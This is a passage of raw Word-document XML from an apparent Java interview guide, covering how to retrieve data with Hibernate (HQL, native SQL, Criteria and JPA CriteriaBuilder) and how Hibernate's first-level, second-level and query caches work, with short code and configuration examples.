    <w:p w14:paraId="115A51D0"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riteria criteria = session.createCriteria(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5101594D"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riteria.add(Restrictions.eq("department", "IT"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCBB66A"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ist&lt;Employee&gt; results = criteria.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121D960"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9CFBAF" w14:textId="77777777" w:rsidR="00490B22"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9D23D11">
          <v:rect id="_x0000_i2398" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5370512C" w14:textId="77777777" w:rsidR="00490B22" w:rsidRPr="007F3379" w:rsidRDefault="00490B22"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4. Using JPA CriteriaBuilder (Hibernate 5+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6F4B5"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lastRenderedPageBreak/>
        <w:t>For type-safe and dynamic queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35467090"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A590F9D"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riteriaBuilder cb = session.getCriteriaBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8E8ED"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riteriaQuery&lt;Employee&gt; cq = cb.createQuery(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CCC5B5"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Root&lt;Employee&gt; root = cq.from(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9831A"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q.select(root).where(cb.equal(root.get("department"), "IT"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B747D3"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ist&lt;Employee&gt; results = session.createQuery(cq).getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4B3927"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC5C4A" w14:textId="77777777" w:rsidR="00490B22"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17D741F">
          <v:rect id="_x0000_i2399" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD7BE5" w14:textId="77777777" w:rsidR="00490B22" w:rsidRPr="007F3379" w:rsidRDefault="00490B2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ach approach has its use case depending on flexibility, type-safety, and performance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A226759" w14:textId="65A4648B" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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8CB9873">
          <v:rect id="_x0000_i2400" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5BE412" w14:textId="1114C8B4" w:rsidR="00FC5A6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC5A6D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="543" w:name="_Toc196308023"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to retrieve data through hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="543"/>
    </w:p>
    <w:p w14:paraId="32724FB0" w14:textId="74403D0B" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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To retrieve data through </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you typically follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6667CE6E" w14:textId="77777777" w:rsidR="00077806"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FC9462C">
          <v:rect id="_x0000_i2401" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37673458" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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1. Configure Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4FDA68" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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Use hibernate.cfg.xml or annotations to set up DB connection and entity mappings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A715E" w14:textId="77777777" w:rsidR="00077806"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795D08A">
          <v:rect id="_x0000_i2402" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="335BF5B8" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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2. Open Hibernate Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE7420" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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Use SessionFactory to get a session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE9D91F" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B70DF" w14:textId="77777777" w:rsidR="00077806"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96E0DB6">
          <v:rect id="_x0000_i2403" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64660987" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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3. Retrieve Data Using Any of These Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39887D2D" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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a) HQL (Hibernate Query Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4436E7DC" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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tring hql = "FROM Employee WHERE department = :dept";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0969CBD3" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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lt;Employee&gt; query = session.createQuery(hql, Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD1C85" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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setParameter("dept", "IT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FBDD02" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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ist&lt;Employee&gt; employees = query.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705A3C2A" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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b) Native SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2F811" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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tring sql = "SELECT * FROM employee WHERE department = :dept";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B371BA" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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lt;Employee&gt; query = session.createSQLQuery(sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EC656" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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addEntity(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB9BF2" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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setParameter("dept", "IT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A706C" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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ist&lt;Employee&gt; employees = query.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007D373" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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c) Criteria API (older versions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5747B220" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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riteria criteria = session.createCriteria(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74895D2C" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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riteria.add(Restrictions.eq("department", "IT"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8623C" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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ist&lt;Employee&gt; employees = criteria.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D7E60" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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d) JPA CriteriaBuilder (recommended in Hibernate 5+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5195F5E7" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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riteriaBuilder cb = session.getCriteriaBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01076E45" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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riteriaQuery&lt;Employee&gt; cq = cb.createQuery(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151E0E42" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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Root&lt;Employee&gt; root = cq.from(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D15AE81" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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q.select(root).where(cb.equal(root.get("department"), "IT"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D45682" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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ist&lt;Employee&gt; employees = session.createQuery(cq).getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04076789" w14:textId="77777777" w:rsidR="00077806"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10AED8">
          <v:rect id="_x0000_i2404" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1BAFFD" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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4. Close the Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B3FBF" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E466D30" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7BF1A" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1970"/>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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for simplicity and object-based querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB1B3D" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1970"/>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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Native SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for DB-specific queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE0E858" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1970"/>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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Criteria API</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for dynamic or conditional queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E7B78" w14:textId="77777777" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1970"/>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Always close the session after use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE3F28" w14:textId="63BC4CAB" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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552C780">
          <v:rect id="_x0000_i2405" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD6338" w14:textId="03755D15" w:rsidR="006764D9" w:rsidRPr="00CE4B95" w:rsidRDefault="002331D0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="544" w:name="_Toc196308024"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidR="006764D9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hibernate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006764D9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>aching?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="544"/>
    </w:p>
    <w:p w14:paraId="62F27782" w14:textId="38A5A4D6" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Hibernate Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> improves performance by reducing the number of database hits. It stores frequently accessed data in memory so repeated queries can be served quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF91B8" w14:textId="77777777" w:rsidR="00102B4C"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E68D76">
          <v:rect id="_x0000_i2406" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5EB01" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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Types of Caching in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387550D1" w14:textId="77777777" w:rsidR="00102B4C"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1CDB69D">
          <v:rect id="_x0000_i2407" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA3866" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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1. First-Level Cache (Default, Session Scoped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284245B2" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1971"/>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nabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117890B0" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1971"/>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ached per Hibernate Session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59536D4D" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1971"/>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ame session → same entity requested → fetched from cache, not DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70951A1B"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231776AC"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mployee emp1 = session.get(Employee.class, 1); // Hits DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56305782"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mployee emp2 = session.get(Employee.class, 1); // From cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A0AD1" w14:textId="77777777" w:rsidR="00102B4C"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BE3A190">
          <v:rect id="_x0000_i2408" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DBFAF" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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2. Second-Level Cache (Optional, SessionFactory Scoped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF4230" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1972"/>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hared across sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B0C52" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1972"/>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Must be explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35847A4F" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1972"/>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Requires integration with cache providers like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654FE58" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1972"/>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hcache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE410B" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1972"/>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nfinispan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39024359" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1972"/>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Hazelcast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE8D04"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onfiguration Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4AA92"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t;property name="hibernate.cache.use_second_level_cache"&gt;true&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A06DE4"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t;property name="hibernate.cache.region.factory_class"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA4AF46"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org.hibernate.cache.ehcache.EhCacheRegionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4FC8E"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t;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB98B42"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Entity Annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C203B3D"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D9251"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ache(usage = CacheConcurrencyStrategy.READ_ONLY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7132EA57"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ublic class Employee { ... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4954FF4B" w14:textId="77777777" w:rsidR="00102B4C"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6BA0D51">
          <v:rect id="_x0000_i2409" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2CB78" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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3. Query Cache (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD491AA" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1973"/>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aches the result of queries (not entities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE4DCC7" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1973"/>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Needs second-level cache enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6BD13"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 query = session.createQuery("FROM Employee");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C04245"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setCacheable(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB05AB"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ist&lt;Employee&gt; employees = query.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5383B" w14:textId="77777777" w:rsidR="00102B4C"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A9DCDF2">
          <v:rect id="_x0000_i2410" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DAF160" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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55"/>
        <w:gridCol w:w="1391"/>
        <w:gridCol w:w="1523"/>
        <w:gridCol w:w="3418"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="501993A7" w14:textId="77777777" w:rsidTr="00102B4C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B6A9D5C" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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Cache Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14238FB7" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="334D2949" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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Config Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3235AC23" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4C"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Typical Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="72032CBE" w14:textId="77777777" w:rsidTr="00102B4C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00425ED0"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First-Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D3C0FAE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
